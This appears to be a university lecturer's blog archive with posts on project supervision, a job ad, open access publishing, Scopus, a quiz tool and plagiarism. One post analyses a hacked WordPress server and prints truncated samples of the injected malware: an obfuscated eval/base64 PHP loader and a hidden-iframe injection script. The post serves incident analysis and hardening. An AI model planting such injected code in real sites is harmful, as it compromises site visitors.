Choosing a project supervisor

Leave a reply

Dear students,

given that the deadline for choosing a supervisor is coming up soon, a friend of mine has suggested that I post a “serious” set of recommendations for now… So here are the suggestions I have (and that I keep repeating to my students):

First of all, try to think of the following:

  • What would you like to do? I don’t mean what would you like to do now, I really mean: what would you like to do when you finish your studies? Do you want to be a programmer? Do you want to be an analyst? What is your favourite activity? Think of your future, and use the final year project as a way to reach what you want to do / what you want to be.
  • You need to do a good job in your final year project: not only it will contribute substantially to your final mark, but you can also use your project in your job applications. It needs to identify a problem and you need to show your solution, and more importantly your path to reach that solution.

At this point, you can start looking for your supervisor. Look for someone with a research interest close to the topic you like, or someone teaching a similar subject. Have a look at the staff pages (start from http://www.cs.mdx.ac.uk). Don’t be shy: send emails and, more importantly, go to lecturers’ office hours! (check the right-hand side for my office hours).

  • Be prepared to change your topic. In a number of cases your project may be too ambitious for the short time you have, or maybe a solution exists already (in this case you could try to improve the solution)
  • Don’t try to copy someone else’s structure or topic: remember, you have to do what you like!
  • Have a look at the material that is available online (myunihub). In particular, have a look at how you will be assessed: it is important to develop a product or to obtain results, but it is equally important to do a literature review, requirements anakysis, and design. An excellent piece of software without documentation is not enough, remember that you need to show your path.

Job ad: Linux + PHP + MySQL + Python

Leave a reply

A company I know is looking for someone with some experience of Linux system administration, PHP + (My/Postre)SQL and Phyton. The company is a start-up based in a great location (very close to Tower Bridge and the Design Museum). Salary is 40K. Contact me if you are interested and I’ll give you more details.

XSS exploit and WordPress

Leave a reply

A couple of people sent me an email yesterday saying that one of the web sites I manage was a bit slow and in some cases it was crashing their browsers. As soon as I had a bit of time to check the website it was immediately clear that it wasn’t a configuration problem or CSS bug: the main page was trying to include strange links. I had a quick look at the source code of the page returned by the web server (using curl):

1
2
3

<script type="text/javascript">
// A lot of stuff here
  document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

I sat down with another sysadmin and we immediately found out that there was a problem with some of the php pages of this site and of other web sites on the same server. All the affected php pages had the first line containing the following php code:

<?php    eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX [...]'))); ?>

After decoding, this code does the following:

1
2
3
4
5
6
7
8
9
10
11
12
13

<?php 
   // [...]
   $dbf=$dr.'/'.md5(date('m.d.y'));
   $odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);
   if (file_exists($odbf))
     @unlink($odbf);
   if(strpos(@file_get_contents($dbf),$ip) === false){
      if( !preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])) {
        print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] "
     }
   }
}
?>

The line

  print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] ";

contains yet another encoded string (the variable n) that is passed to the browser, and then interpreted by the client to generate HTML code similar to the following:

1
2

  // A lot of stuff here
  document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

And this is a standard frame injection. We did a bit of analysis and we found that:

  • php.ini was configured to allow fopen of URL
  • Various folders were writable by the web server
  • All the infected files were owned / writable by the user running the web server

In essence: a cross-site scripting exploit that took advantage of writable folders in a shared environment. Thus, for your next installation of WordPress, have a look at Hardening WordPress, and in particular at the File Permissions section.

Voluntary Open Access Journals

Leave a reply

A recent article on The Guardian started (yet another) discussion on Open Access Journals. One party asks whether the results of publicly-funded research should only be available for a fee that helps the balance sheet of academic publisher. The other party wonders how do we avoid predatory publishers of Open Access journals charging $500 or more to publish a paper, and playing the “impact factor game“.

I don’t have an answer, I only have another question…All the work I do for academic publishers is voluntary. I review various dozens of articles every year for free, because I can list this activity in my CV. The same happens for editorial boards: academics do it for free. My question is: can’t we do (as academics) the whole publishing process as voluntary? In addition to non-paid reviewers and non-paid associated editors, why don’t we have non-paid associated sysadmins to manage a server?

There are various business models available for open access journals. What would be wrong with the following idea?

  1. Authors are charged a small fee (say $20 for each accepted paper)
  2. Assuming 4 issues per year, 10 articles in each issue would generate approx $800/year. This should be more than enough to maintain a couple of virtual machines (mirrored, for backups). I think ISSN numbers are free, but this needs to be investigated.
  3. Open source software is available to manage submissions and reviews.
  4. Electronic copies are made available for free, hard copies can be printed on-demand: editors prepare a PDF version of each issue and upload it to like lulu.com or a similar service, and libraries can print it from there if a hard copy is really needed.
  5. New journals are created by a “group of experts”, similarly to the creation of a new conference / workshop.

 

SCOPUS: check your profile

Leave a reply

Yesterday we played “let’s see who has the bigger h-index” with a couple of colleagues. We decided to use Scopus (well, the free version of it) because it gives more conservative results wrt to Google Scholar. Also,  Scopus may be used for assessing the quality of research, and I can easily imagine a reviewer looking for my profile if I submit a proposal or a paper.

I was a bit surprised to discover that I do not appear in Scopus:

There is a Raimondi Francesco Maria with publications in Medicine, Engineering, Computer Science, and additional areas that I cannot see because I do not have a Scopus account.

This is strange: I’m sure some of my publications should appear here (some of them are with Elsevier!), I have a Google Scholar Profile and it is more or less accurate.

I decided to contact the helpdesk using the “Live Chat” option. This was quite useful as I discovered a website to “fix” these issues: http://www.scopusfeedback.com/

 The process is quite boring, but at least I could find my papers: they are listed under Raimondi Francesco Maria. I had to scroll the whole list of publications and manually select those that are mine. I have done this yesterday afternoon, I am not listed as a separate author yet, but hopefully someone is on the case…

So, to sum up: check your profile on Scopus.

http://eqna.tk: a simple application to create multiple-choice tests

Leave a reply

The idea is to exploit the fact that nearly all students now have a smartphone, and  some of them keep using it even during lectures. This year I decided not to ask students to switch off their mobiles; instead, I’ll ask them to use it to interact with me.

The motivation is that sometimes it may be difficult to grasp the sentiment of a class, especially if there are more than 20 students. With this tool (developed by Lalith Kaushik and I) I can prepare questions in advance, or  even during the lecture as the process only takes a few seconds.

Students can answer multiple-choice questions from their mobile phone using a short code (that can also be shared using facebook and twitter. BIS4610 students: please follow https://twitter.com/bis4610). The answer page is designed specifically to be accessed from a mobile device (and indeed it looks a bit strange on a standard PC)

The tool can be used to assess students’ comprehension of a topic (e.g. by asking “what is the square root of 16?”), but it can also be used to obtain feedback about delivery (“The pace of the lecture is: too slow / too fast / about right), and suggestions for future sessions (“What would you like to do next week? Revision / Mock exam / Practical session), etc.

On plagiarism etc.

Leave a reply

Dear student,

in your final year you will need to work on a project that will require a substantial amount of your time. There is plenty of information available on this subject, please have a look at the material available on myunihub for your specific project module.

It is very likely that you will be able to choose the topic of your project in collaboration with your supervisor. Remember to choose something that you like, because you will need to spend a lot of time on it. If you like to write code, then you can develop a tool. If coding is not exactly your favourite activity, you can probably identify a problem and work on a systematic review of existing solutions for it, and propose new approaches for solving it. See our recent work on Systematic Literature Reviews to have an idea of this kind of activity.

There is also plenty of information available on how to cite material; don’t worry, you are welcome to report verbatim entire phrases from existing documents, provided you quote them in the appropriate way and you provide a reference for them. See the material available at this link for further guidance:

http://unihub.mdx.ac.uk/study/ldu/onlineresources/referencing-plagiarism/index.aspx

In all cases, remember that you cannot take “shortcuts”. I had too many cases of students postponing their project until the last minute, and then submitting work created by someone else. Remember that is is not enough to have a positive originality report from Turnitin… I have investigated this problem as part of my Postgraduate Certificate in Higher Education: please have a look at this report on the effectiveness of anti-plagiarism software if you are curious about the topic.

Hello world!

1 Reply

After 11 years (!!) I decided it was about time to refresh my web site…

I am in the process of copying all the material and links from the previous version to this new structure, please let me know if you notice something wrong.

I will try to keep things up-to-date and I have also enabled comments. If you are a student just have a look at the pages under Teaching (and let me know if you are not able to find something you need).

If you are looking for a paper, please have a look at my Publications page. If you are not able to retrieve a file just send me an email and I will post it to you.